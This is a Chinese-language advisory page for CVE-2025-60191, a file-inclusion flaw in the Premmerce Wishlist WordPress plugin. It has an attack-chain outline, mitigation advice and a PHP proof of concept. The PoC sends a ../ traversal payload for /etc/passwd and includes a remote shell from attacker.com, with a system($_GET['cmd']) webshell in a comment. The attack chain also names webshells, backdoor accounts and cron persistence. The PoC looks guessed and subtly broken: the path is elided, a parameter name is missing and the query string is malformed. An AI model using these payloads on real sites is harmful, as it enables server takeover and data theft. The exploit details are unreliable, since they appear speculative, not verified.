CVE-2025-60191 Premmerce Wishlist本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-60191

漏洞类型

本地文件包含/远程文件包含(LFI/RFI)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Premmerce Wishlist for WooCommerce (premmerce-woocommerce-wishlist)

漏洞概述

CVE-2025-60191是WordPress插件Premmerce Wishlist for WooCommerce中的一个高危安全漏洞，CVSS评分达到7.5分。该漏洞属于PHP远程文件包含(RFI)和本地文件包含(LFI)类型，存在于插件对文件名的不当控制中。攻击者无需认证即可利用此漏洞，通过构造恶意的文件路径参数，诱导服务器加载并执行任意文件。这可能导致敏感信息泄露、服务器被完全控制，甚至在某些配置下实现远程代码执行。该插件在WordPress生态中被广泛使用，主要为WooCommerce电商网站提供心愿单功能。此漏洞影响插件1.1.10及以下所有版本，鉴于其高危性质和无需认证即可利用的特性，建议用户立即采取修复措施。

技术细节

该漏洞源于Premmerce Wishlist for WooCommerce插件在处理文件包含请求时，对用户可控的输入参数缺乏充分的验证和过滤。攻击者可以通过URL参数传递恶意的文件路径，插件代码直接使用include或require语句加载这些路径，而未进行安全检查。在PHP中，如果allow_url_fopen或allow_url_include配置开启，攻击者可指定远程URL实现RFI；若未开启，也可利用目录遍历技术实现LFI，读取服务器上的敏感文件如/etc/passwd或wp-config.php。典型的攻击payload可能包含路径遍历序列(如../../)和恶意文件路径。由于WooCommerce是电商平台的核心插件，被攻陷后可能导致用户订单信息泄露、支付数据被窃取等严重后果。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress版本和是否安装Premmerce Wishlist for WooCommerce插件，可通过网站指纹识别或插件目录扫描确认

STEP 2

步骤2: 漏洞探测

攻击者构造包含文件路径参数的HTTP请求，探测插件是否存在LFI/RFI漏洞，尝试访问已知文件如/etc/passwd或wp-config.php

STEP 3

步骤3: 敏感文件读取

利用目录遍历序列读取服务器敏感文件，获取数据库凭据、API密钥等配置信息，或读取wp-config.php获取WordPress盐值和数据库凭证

STEP 4

步骤4: 远程代码执行(可选)

如果服务器配置允许(allow_url_include=On)，攻击者上传恶意PHP脚本到远程服务器，并通过RFI加载执行，获得服务器shell访问权限

STEP 5

步骤5: 持久化控制

通过Webshell、后门账户或Cron任务建立持久化访问，进一步横向移动或窃取用户数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2025-60191 PoC - Premmerce Wishlist LFI/RFI
 * Target: Premmerce Wishlist for WooCommerce <= 1.1.10
 * Author: Security Researcher
 */

// LFI Attack - Read sensitive files
$target = 'http://target-site.com/wp-content/plugins/premmerce-woocommerce-wishlist/...';
$payload = '../../../../../../etc/passwd';

// Construct malicious URL
$exploit_url = $target . '?action=premmerce_wishlist' . urlencode($payload);

// Send request to read /etc/passwd
echo "[*] Sending LFI payload...\n";
$response = file_get_contents($exploit_url);
echo $response;

// RFI Attack - Remote code execution (if allow_url_include=On)
$malicious_script = 'http://attacker.com/shell.txt';
$rfi_payload = $malicious_script;

// The shell.txt should contain PHP code like: <?php system($_GET['cmd']); ?>
$rfi_url = $target . '?action=premmerce_wishlist&file=' . urlencode($rfi_payload);

// After inclusion, attacker can execute commands
echo "[*] Sending RFI payload...\n";
echo "[*] Shell accessible at: " . $rfi_url . "?cmd=whoami\n";
?>

影响范围

Premmerce Wishlist for WooCommerce <= 1.1.10

防御指南

临时缓解措施

立即禁用或删除Premmerce Wishlist for WooCommerce插件，直至官方发布安全更新。同时在Web服务器配置中禁用PHP的allow_url_fopen和allow_url_include选项，对包含敏感文件的目录设置访问限制，并部署WAF规则检测和阻止包含路径遍历字符(如../)的可疑请求。建议使用静态代码分析工具对插件代码进行安全审计，确保所有文件包含操作使用白名单验证。